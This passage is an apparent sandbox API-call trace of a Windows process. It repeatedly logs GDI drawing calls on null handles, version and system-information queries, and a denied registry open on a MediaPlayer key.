lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0091.194] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.194] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0091.194] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0091.194] BeginPath (hdc=0x0) returned 0 [0091.194] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0091.194] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0091.194] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.194] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0091.194] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0091.194] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0091.194] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0091.194] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0091.194] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xda0401d9 [0091.194] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xd80401dc [0091.194] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045a71 [0091.194] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045a72 [0091.194] CombineRgn (hrgnDst=0x1045a71, hrgnSrc1=0xda0401d9, hrgnSrc2=0xd80401dc, iMode=1) returned 1 [0091.194] CombineRgn (hrgnDst=0x1045a72, hrgnSrc1=0xda0401d9, hrgnSrc2=0xd80401dc, iMode=4) returned 2 [0091.194] CreateSolidBrush (color=0xff) returned 0x2105a70 [0091.195] CreateSolidBrush (color=0xff0000) returned 0x1105a73 [0091.195] DeleteObject (ho=0x1105a73) returned 1 [0091.195] DeleteObject (ho=0xd80401dc) returned 1 [0091.195] DeleteObject (ho=0xda0401d9) returned 1 [0091.195] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0091.195] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0091.195] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.195] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0091.195] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0091.195] BeginPath (hdc=0x0) returned 0 [0091.195] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0091.195] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0091.195] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.195] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0091.195] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0091.195] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0091.195] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0091.195] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0091.195] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xd90401dc [0091.195] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xdb0401d9 [0091.195] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045a74 [0091.195] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045a75 [0091.195] CombineRgn (hrgnDst=0x1045a74, hrgnSrc1=0xd90401dc, hrgnSrc2=0xdb0401d9, iMode=1) returned 1 [0091.195] CombineRgn (hrgnDst=0x1045a75, hrgnSrc1=0xd90401dc, hrgnSrc2=0xdb0401d9, iMode=4) returned 2 [0091.195] CreateSolidBrush (color=0xff) returned 0x2105a73 [0091.195] CreateSolidBrush (color=0xff0000) returned 0x1105a76 [0091.195] DeleteObject (ho=0x1105a76) returned 1 [0091.195] DeleteObject (ho=0xdb0401d9) returned 1 [0091.195] DeleteObject (ho=0xd90401dc) returned 1 [0091.195] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0091.196] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0091.196] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.196] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0091.196] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0091.196] BeginPath (hdc=0x0) returned 0 [0091.196] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0091.196] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0091.196] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.196] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0091.196] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0091.196] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0091.196] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0091.196] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0091.196] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xdc0401d9 [0091.196] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xda0401dc [0091.196] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045a77 [0091.196] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045a78 [0091.196] CombineRgn (hrgnDst=0x1045a77, hrgnSrc1=0xdc0401d9, hrgnSrc2=0xda0401dc, iMode=1) returned 1 [0091.196] CombineRgn (hrgnDst=0x1045a78, hrgnSrc1=0xdc0401d9, hrgnSrc2=0xda0401dc, iMode=4) returned 2 [0091.196] CreateSolidBrush (color=0xff) returned 0x2105a76 [0091.196] CreateSolidBrush (color=0xff0000) returned 0x1105a79 [0091.196] DeleteObject (ho=0x1105a79) returned 1 [0091.196] DeleteObject (ho=0xda0401dc) returned 1 [0091.196] DeleteObject (ho=0xdc0401d9) returned 1 [0091.196] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0091.196] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0091.196] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.196] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0091.197] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0091.197] BeginPath (hdc=0x0) returned 0 [0091.197] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0091.197] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0091.197] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.197] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0091.197] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0091.197] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0091.197] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0091.197] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0091.197] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xdb0401dc [0091.197] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xdd0401d9 [0091.197] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045a7a [0091.197] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045a7b [0091.197] CombineRgn (hrgnDst=0x1045a7a, hrgnSrc1=0xdb0401dc, hrgnSrc2=0xdd0401d9, iMode=1) returned 1 [0091.197] CombineRgn (hrgnDst=0x1045a7b, hrgnSrc1=0xdb0401dc, hrgnSrc2=0xdd0401d9, iMode=4) returned 2 [0091.197] CreateSolidBrush (color=0xff) returned 0x2105a79 [0091.197] CreateSolidBrush (color=0xff0000) returned 0x1105a7c [0091.197] DeleteObject (ho=0x1105a7c) returned 1 [0091.197] DeleteObject (ho=0xdd0401d9) returned 1 [0091.197] DeleteObject (ho=0xdb0401dc) returned 1 [0091.197] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0091.197] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0091.197] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.197] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0091.197] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0091.197] BeginPath (hdc=0x0) returned 0 [0091.197] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0091.197] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0091.197] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.197] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0091.197] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0091.197] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0091.198] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0091.198] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0091.198] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xde0401d9 [0091.198] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xdc0401dc [0091.198] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045a7d [0091.198] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045a7e [0091.198] CombineRgn (hrgnDst=0x1045a7d, hrgnSrc1=0xde0401d9, hrgnSrc2=0xdc0401dc, iMode=1) returned 1 [0091.198] CombineRgn (hrgnDst=0x1045a7e, hrgnSrc1=0xde0401d9, hrgnSrc2=0xdc0401dc, iMode=4) returned 2 [0091.198] CreateSolidBrush (color=0xff) returned 0x2105a7c [0091.198] CreateSolidBrush (color=0xff0000) returned 0x1105a7f [0091.198] DeleteObject (ho=0x1105a7f) returned 1 [0091.198] DeleteObject (ho=0xdc0401dc) returned 1 [0091.198] DeleteObject (ho=0xde0401d9) returned 1 [0091.198] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0091.198] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0091.198] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.198] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0091.198] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0091.198] BeginPath (hdc=0x0) returned 0 [0091.198] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0091.198] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0091.198] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.198] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0091.198] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0091.198] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0091.198] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0091.198] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0091.199] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xdd0401dc [0091.199] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xdf0401d9 [0091.199] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045a80 [0091.199] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045a81 [0091.199] CombineRgn (hrgnDst=0x1045a80, hrgnSrc1=0xdd0401dc, hrgnSrc2=0xdf0401d9, iMode=1) returned 1 [0091.199] CombineRgn (hrgnDst=0x1045a81, hrgnSrc1=0xdd0401dc, hrgnSrc2=0xdf0401d9, iMode=4) returned 2 [0091.199] CreateSolidBrush (color=0xff) returned 0x2105a7f [0091.199] CreateSolidBrush (color=0xff0000) returned 0x1105a82 [0091.199] DeleteObject (ho=0x1105a82) returned 1 [0091.199] DeleteObject (ho=0xdf0401d9) returned 1 [0091.199] DeleteObject (ho=0xdd0401dc) returned 1 [0091.199] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0091.199] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0091.199] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.199] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0091.199] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0091.199] BeginPath (hdc=0x0) returned 0 [0091.199] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0091.199] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0091.199] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.199] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0091.199] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0091.199] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0091.199] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0091.199] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0091.199] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xe00401d9 [0091.199] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xde0401dc [0091.199] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045a83 [0091.200] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045a84 [0091.200] CombineRgn (hrgnDst=0x1045a83, hrgnSrc1=0xe00401d9, hrgnSrc2=0xde0401dc, iMode=1) returned 1 [0091.200] CombineRgn (hrgnDst=0x1045a84, hrgnSrc1=0xe00401d9, hrgnSrc2=0xde0401dc, iMode=4) returned 2 [0091.200] CreateSolidBrush (color=0xff) returned 0x2105a82 [0091.200] CreateSolidBrush (color=0xff0000) returned 0x1105a85 [0091.200] DeleteObject (ho=0x1105a85) returned 1 [0091.200] DeleteObject (ho=0xde0401dc) returned 1 [0091.200] DeleteObject (ho=0xe00401d9) returned 1 [0091.200] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0091.200] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0091.200] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.200] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0091.200] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0091.200] BeginPath (hdc=0x0) returned 0 [0091.200] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0091.200] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0091.200] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.200] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0091.200] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0091.200] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0091.200] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0091.200] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0091.200] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xdf0401dc [0091.200] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xe10401d9 [0091.200] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045a86 [0091.200] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045a87 [0091.200] CombineRgn (hrgnDst=0x1045a86, hrgnSrc1=0xdf0401dc, hrgnSrc2=0xe10401d9, iMode=1) returned 1 [0091.200] CombineRgn (hrgnDst=0x1045a87, hrgnSrc1=0xdf0401dc, hrgnSrc2=0xe10401d9, iMode=4) returned 2 [0091.200] CreateSolidBrush (color=0xff) returned 0x2105a85 [0091.200] CreateSolidBrush (color=0xff0000) returned 0x1105a88 [0091.201] DeleteObject (ho=0x1105a88) returned 1 [0091.201] DeleteObject (ho=0xe10401d9) returned 1 [0091.201] DeleteObject (ho=0xdf0401dc) returned 1 [0091.201] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0091.201] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0091.201] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.201] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0091.201] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0091.201] BeginPath (hdc=0x0) returned 0 [0091.201] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0091.201] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0091.201] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.201] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0091.201] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0091.201] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0091.201] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0091.201] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0091.201] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xe20401d9 [0091.201] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xe00401dc [0091.201] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045a89 [0091.201] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045a8a [0091.201] CombineRgn (hrgnDst=0x1045a89, hrgnSrc1=0xe20401d9, hrgnSrc2=0xe00401dc, iMode=1) returned 1 [0091.201] CombineRgn (hrgnDst=0x1045a8a, hrgnSrc1=0xe20401d9, hrgnSrc2=0xe00401dc, iMode=4) returned 2 [0091.201] CreateSolidBrush (color=0xff) returned 0x2105a88 [0091.201] CreateSolidBrush (color=0xff0000) returned 0x1105a8b [0091.201] DeleteObject (ho=0x1105a8b) returned 1 [0091.201] DeleteObject (ho=0xe00401dc) returned 1 [0091.201] DeleteObject (ho=0xe20401d9) returned 1 [0091.201] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0091.201] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0091.202] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.202] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0091.202] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0091.202] BeginPath (hdc=0x0) returned 0 [0091.202] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0091.202] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0091.202] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: 